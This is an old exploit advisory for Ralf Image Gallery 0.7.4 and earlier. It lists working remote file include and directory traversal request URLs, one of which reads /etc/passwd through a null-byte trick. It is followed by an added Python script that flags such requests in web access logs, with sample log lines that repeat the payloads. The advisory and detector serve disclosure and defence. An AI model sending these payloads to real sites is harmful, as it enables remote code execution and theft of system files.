Title: Ralf Image Gallery <= 0.7.4 - Multiple Remote File Include and directory traversal Vulnerabilities
-----------------------------------------------------------------
Vendor: RIG is developed and maintained by Le R'alf
URL: http://rig.powerpulsar.com/
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------

Exploitation:
-----------------------------------------------------------------

/check_entry.php?dir_abs_src=http://www.yourspace.com/yourscript.php?
/check_entry.php?dir_abs_src=../../../../../../../../../etc/passwd%00
/admin_album.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_image.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
/admin_translate.php?dir_abs_admin_src=http://www.yourspace.com/yourscript.php?
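
Added example, not part of the original advisory: a log triage script that flags requests to the four scripts listed above when the include-path parameter carries a URL, a traversal sequence or a null byte. It assumes a combined-format access log; the function names, hosts and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script -> include-path parameter, taken from the advisory's request list.
RIG_PARAMS = {
    "check_entry.php": "dir_abs_src",
    "admin_album.php": "dir_abs_admin_src",
    "admin_image.php": "dir_abs_admin_src",
    "admin_translate.php": "dir_abs_admin_src",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)

def classify(value):
    """Return the reasons a parameter value looks like include abuse."""
    for _ in range(3):  # undo nested encoding such as %252e%252e%252f
        value = unquote(value)
    reasons = []
    if SCHEME_RE.match(value):
        reasons.append("remote-url")
    if "../" in value or "..\\" in value:
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    return reasons

def scan(lines):
    """Return [(line_no, script, reasons)] for requests worth triaging."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key == RIG_PARAMS.get(script) and classify(val):
                hits.append((n, script, classify(val)))
    return hits

SAMPLE_LOG = [  # constructed access-log lines, not real traffic
    '192.0.2.10 - - [22/Jun/2006:10:00:01 +0000] "GET /rig/index.php?album=summer HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Jun/2006:10:00:07 +0000] "GET /rig/check_entry.php?dir_abs_src=http://host.example/x.php? HTTP/1.1" 200 312',
    '192.0.2.44 - - [22/Jun/2006:10:00:09 +0000] "GET /rig/check_entry.php?dir_abs_src=../../../../etc/passwd%00 HTTP/1.1" 200 1404',
    '192.0.2.44 - - [22/Jun/2006:10:00:12 +0000] "GET /rig/admin_image.php?dir_abs_admin_src=%252e%252e%252fconf HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit only shows that the request was made; the response status and size in the same log line help decide whether the include actually succeeded.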

# milw0rm.com [2006-06-22]